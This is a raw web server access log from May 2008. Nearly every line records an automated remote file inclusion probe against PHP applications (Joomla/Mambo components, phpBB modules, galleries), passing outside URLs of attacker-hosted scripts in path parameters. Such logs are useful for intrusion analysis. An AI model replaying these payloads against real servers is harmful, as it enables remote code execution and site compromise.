58.26.137.64 - - [19/May/2008:09:59:44 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:59:45 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:59:48 -0700] "GET /logs/access.log/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:09:59:54 -0700] "GET /logs/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:00:01 -0700] "GET /index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:10:00:05 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.avedila.com/avedila/.../bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:00:08 -0700] "GET //includes/db_adodb.php?baseDir=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:10:00:23 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:10:01:01 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.avedila.com/avedila/.../bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
219.119.139.78 - - [19/May/2008:10:01:04 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.blasterwb.com/publicidad/windowfilm/fotos/idv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:01:05 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:01:05 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:01:51 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:01:51 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:01:51 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:01:57 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:01:57 -0700] "GET //include/lib.inc.php?site_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:16 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:17 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:17 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:02:20 -0700] "GET /logs/access_080113.log//Neos_Chronos/header.php?base_folder=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:02:23 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:02:29 -0700] "GET /logs/index.php?url=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:10:02:35 -0700] "GET /index.php?url=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:02:43 -0700] "GET //modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:02:45 -0700] "GET //modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.125.251.37 - - [19/May/2008:10:02:45 -0700] "GET //modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:47 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:48 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:02:48 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [19/May/2008:10:02:56 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32958 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:10:03:15 -0700] "GET /logs/access_080218.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:10:03:25 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:03:49 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:10:03:52 -0700] "GET /logs/access_080327.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:07 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:08 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:08 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:08 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:09 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:09 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:04:09 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:04:15 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [19/May/2008:10:04:15 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:04:16 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:04:16 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:04:16 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:04:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:10:04:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:32 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:32 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:10:04:38 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:10:04:45 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:10:04:45 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:04:47 -0700] "GET /logs/index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:04:54 -0700] "GET /index.php?opcao=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:04:55 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:10:04:56 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.231.60.28 - - [19/May/2008:10:05:16 -0700] "GET /logs/access_080223.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:05:23 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:10:05:23 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
204.15.133.133 - - [19/May/2008:10:05:25 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.133.133 - - [19/May/2008:10:05:25 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.133.133 - - [19/May/2008:10:05:25 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.133.133 - - [19/May/2008:10:05:27 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.228.192.196 - - [19/May/2008:10:05:31 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.228.192.196 - - [19/May/2008:10:05:31 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.228.192.196 - - [19/May/2008:10:05:31 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:10:05:33 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:10:05:34 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:10:05:35 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:10:05:35 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.228.192.196 - - [19/May/2008:10:05:37 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:06:19 -0700] "GET /logs/access_080327.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.212.40 - - [19/May/2008:10:06:22 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.hk-jeonjihyun.com/hk/egg/user.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [19/May/2008:10:06:24 -0700] "GET /logs/access_080327.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:06:42 -0700] "GET //modules/xfsection/modify.php?dir_module=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.102 - - [19/May/2008:10:06:43 -0700] "GET //includes/db_adodb.php?baseDir=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:06:44 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:06:44 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:10:06:45 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:07:11 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:07:16 -0700] "GET /logs/access_080405.log//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:07:16 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:07:16 -0700] "GET //index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:07:18 -0700] "GET /logs//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:07:19 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.187 - - [19/May/2008:10:07:23 -0700] "GET //include/admin.lib.inc.php?site_path=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:26 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:27 -0700] "GET //includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:27 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.25.42 - - [19/May/2008:10:07:30 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.181.220 - - [19/May/2008:10:07:34 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/blpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:34 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:34 -0700] "GET /logs/access_080127.log//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:35 -0700] "GET //includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:35 -0700] "GET //includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:35 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.30 - - [19/May/2008:10:07:35 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:07:55 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:07:55 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:10:07:55 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:00 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:00 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:08:04 -0700] "GET /logs/access_080229.log//index2.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:04 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:04 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.11.122 - - [19/May/2008:10:08:18 -0700] "GET //include/admin.lib.inc.php?site_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:08:19 -0700] "GET /logs/contenido.php?sec=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.51.26.82 - - [19/May/2008:10:08:20 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:10:08:20 -0700] "GET /contenido.php?sec=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:29 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:10:08:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.127.84.31 - - [19/May/2008:10:08:43 -0700] "GET /logs/index.php?body=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:08:50 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [19/May/2008:10:08:50 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://th3m3.awardspace.com/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
